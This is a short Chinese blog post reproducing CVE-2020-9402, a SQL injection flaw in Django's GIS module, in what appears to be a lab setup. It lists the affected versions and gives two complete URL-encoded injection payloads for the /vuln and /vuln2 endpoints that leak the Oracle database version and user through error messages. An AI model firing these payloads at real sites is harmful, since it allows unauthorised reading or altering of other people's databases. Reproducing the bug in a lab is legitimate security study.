1. 程式人生 > 資料庫 >Django GIS SQL注入漏洞復現(CVE-2020-9402)

Django GIS SQL注入漏洞復現(CVE-2020-9402)

漏洞概述:
Django是Django基金會的一套基於Python語言的開源Web應用框架。該框架包括面向物件的對映器、檢視系統、模板系統等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻擊者可藉助特製的SQL語句利用該漏洞檢視、新增、修改或刪除資料庫中的資訊。
復現流程:
第一個注入漏洞在/vuln目錄下,直接訪問該目錄是無任何回顯的。此時直接對q傳參即可。payload如下:
http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

第二處漏洞在/vuln2目錄下,payload如下:

http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--
執行成功後會有相關sql語句回顯資訊。